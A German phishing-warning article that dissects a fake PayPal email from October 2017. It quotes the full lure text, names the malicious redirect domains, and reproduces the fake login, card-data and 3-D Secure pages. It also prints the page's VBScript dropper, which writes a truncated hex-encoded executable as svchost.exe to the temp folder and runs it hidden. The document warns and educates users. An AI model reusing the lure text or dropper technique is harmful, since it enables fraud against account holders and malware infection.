sehr geehrter kunde von Kundenservice ([email protected]) ist PayPal-Phishing! Achtung: Die verlinkte Seite bringt zusätzlich einen Virus mit (W32.Ramnit!html)!

Am Donnerstag, den 26. Oktober 2017 wurde durch unbekannte Dritte die folgende E-Mail in deutscher Sprache versendet. Achtung: Die E-Mail stammt nicht von PayPal! Klicken Sie deswegen nicht auf den Link und geben Sie keine Daten ein! Klicken Sie schon deswegen nicht auf den Link, weil die betrügerische Seite einen Virus enthalten würde (W32.Ramnit!html)!

Betreff: sehr geehrter kunde
Absender: Kundenservice ([email protected])

Sehr geehrter Kunde, (E-Mail-Adresse)

PayPal sendet diese E-Mail, um Sie darüber zu informieren, dass unser Service für Sie gesperrt werden kann. Dies kann auf einen der folgenden Gründe zurückzuführen sein:

  • Sie haben Ihre Rechnungsadresse geändert.
  • Sie haben falsche Informationen während des Zahlungsvorgangs Ihrer Rechnung übermittelt.
  • Ihre Kredit- / Debitkarte ist abgelaufen.
  • Sie haben Ihr PayPal-Profil nicht aktualisiert.

Was passiert als nächstes?

Um sicherzustellen, dass Ihre Dienstleistung nicht unterbrochen wird, bitten wir um Bestätigung und

Aktualisierung Ihrer Zahlungsinformationen jetzt durch Klicken auf den folgenden Link:

https://www.paypal.com//webapps/mpp/home

Wenn Sie Ihre Zahlungsinformationen bereits bestätigt haben, ignorieren Sie bitte diese Nachricht, da wir bereits die von Ihnen vorgenommenen Änderungen bearbeiten.

Wir sehen uns bald online,

Fiona Hayes
Leiter Kundenservice und Contact Center

Achtung: Es handelt sich um eine gefälschte E-Mail! Die E-Mail stammt nicht von PayPal! Das Unternehmen hat mit der E-Mail nichts zu tun! Klicken Sie deswegen nicht auf den Link und geben Sie keine Daten ein! Klicken Sie schon deswegen nicht auf den Link, weil die betrügerische Seite einen Virus enthalten würde (W32.Ramnit!html)!

PayPal hat eine Informationsseite zu Phishing. Leiten Sie Phishing-Mails mit PayPal-Bezug an [email protected] weiter!

Die verlinkte Seite lowfodmaplife.com/wp-content/languages/ leitet auf daniela.bg/TRY1/OLD/wp-content/media/paypal.com-webapps-service-login%20/ok-de/827b9135f0332f16c61d1e3a4d84aded/ weiter. Beide Adressen gehören nicht zu PayPal! Klicken Sie deswegen nicht auf den Link und geben Sie keine Daten ein! Klicken Sie schon deswegen nicht auf den Link, weil die betrügerische Seite einen Virus enthalten würde (W32.Ramnit!html)!

Die letzte Domain wird SSL-verschlüsselt aufgerufen. Dennoch ist es eine betrügerische Seite:

Die Einstellung der echten PayPal-Seite würde so aussehen:

Unter der Adresse wird ein gefälschtes Login-Formular eingeblendet, welches zur Eingabe der Zugangsdaten auffordert. Geben Sie keine Daten ein! Es handelt sich um eine betrügerische Seite! Alle Eingaben werden an unbekannte Dritte übermittelt und können daher missbraucht werden!

PayPal

E-Mail-Adresse
Passwort
Einloggen

Probleme beim Einloggen?
Neu anmelden

Danach würde es kurz dauern. Die fehlenden Umlaute deuten aber schon auf eine gefälschte Seite hin:

Ihre Eingaben werden ьberprьft…

Still loading after a few seconds? Try again

Die nächste Seite würde zur Verifikation des Konto auffordern. Aber auch hier fehlen die Umlaute.

Konto verifizieren
Aus Sicherheitsgrьnden mьssen wir Ihre Identitдt prьfen.
Weiter

Danach fordert die betrügerische Seite zur Eingabe des Namens sowie der Kreditkarte auf. Geben Sie keine Daten ein! Alle Eingaben werden an unbekannte Dritte übermittelt und können daher missbraucht werden!

Übersicht   Guthaben   Aktivitäten   Berichte   Tools    Mehr

 

Sichere Transaktion

Der Zugriff auf ihr Konto wurde eingeschränkt
Obligatorisch Kreditkarte Aktualisieren

Geben Sie Ihre Kreditkartendaten ein.

Vorname

Nachname
Kartentyp

Kartennummer
Gültig bis Monat

Jahr

Kartenprüfnummer
Die letzten drei Stellen auf der Rückseite Ihrer Karte. Bei American Express eine vierstellige Nummer auf der Vorderseite Ihrer Karte.
Hilfe zu Ihrer Kreditkartenprüfnummer | Verwenden Sie AmEx?

Geben Sie Ihre Bankkontoinformationen .

Bankkontonummer muss mit der Kreditkarte übereinstimmen.

Kontonummer (1- bis 10-stellig)

Geburtsdatum ( TT.MM.JJJJ )
Kreditkarte aktualisieren

Achtung: Der HTML-Code der Seite bringt einen Virus mit! Am Ende der Seite befindet sich ein Script, welches den Code des Virus enthält und per Script auf Ihre Festplatte abspeichern und dort ausführen möchte!

<SCRIPT Language=VBScript><!–
DropFileName = „svchost.exe“
WriteData = „4D5A900[….]4903320“
Set FSO = CreateObject(„Scripting.FileSystemObject“)
DropPath = FSO.GetSpecialFolder(2) & „\“ & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(„&H“ & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(„WScript.Shell“)
WSHshell.Run DropPath, 0
//–></SCRIPT>

Anschließend fordert die betrügerische Seite zur Eingabe des 3D-SecureCode auf. Geben Sie keine Daten ein! Es handelt sich um eine betrügerische Seite! Alle Eingaben werden an unbekannte Dritte übermittelt und können daher missbraucht werden!

3-D Secure – Schützen Sie Ihre Karte
Schützen Sie Ihre Karte

Geben Sie Ihr Passwort ein.

Kartennummer xxxx xxxx xxxx xxxx
Passwort ( SecureCode )

Bestätigen Kreditkarte

Angeblich wurde das Konto erfolgreich aktiviert. Alle Eingaben wurden aber in Wirklichkeit an unbekannte Dritte übermittelt!

Ihr Konto wurde erfolgreich aktiviert

Herzliche Glückwünsche! Ihre Karte ist nun in der VbV Dienst registriert,

die Sicherheit auf diese verbesserte gewährleisten und zukünftige Online-Einkäufe

weierhin Ihr Kontoprofi

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.